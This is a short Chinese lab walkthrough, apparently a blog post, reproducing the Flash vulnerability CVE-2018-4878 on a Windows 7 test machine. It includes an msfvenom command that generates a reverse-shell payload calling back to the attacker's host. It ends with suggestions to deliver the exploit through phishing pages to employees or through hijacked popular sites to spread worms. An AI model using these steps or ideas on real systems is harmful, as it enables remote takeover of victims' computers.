CVE-2018-4878复现
¶前言
2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。
##复现环境
靶机:win7 sp1
攻击机:kali linux
exp:https://github.com/anbai-inc/CVE-2018-4878
flash版本:Adobe Flash 28.0.0.137
¶流程
靶机里安装flash的流程不再赘述
把exp clone 下来
exp里自带的shellcode是windows弹计算器的payload
我们要把payload替换一下 替换成kali的msf生成的shellcode
1 | msfvenom -p windows/meterpreter/reverse_tcp lhost=10.211.55.3 lport=4444 -f python >shellcode.txt |
替换代码里的shellcode
还有要替换的还有路径
执行python cve-2018-4878.py 即可完成exp的生成
用kali开启apache2服务
并且把index.html和exploit.swf放到/var/www/html/里
用msf监听4444端口
用靶机访问
msf成功收到反弹的shell
¶想法
及时更新flash
此方法可以在社会工程学中得到很好的运用,例如制造一个钓鱼网页批量发给企业员工,如果有一个人没有更新flash player并且点入链接即中招。
黑客劫持了一个大流量的网站也可以用flash player进行抓鸡 ,或者散播蠕虫。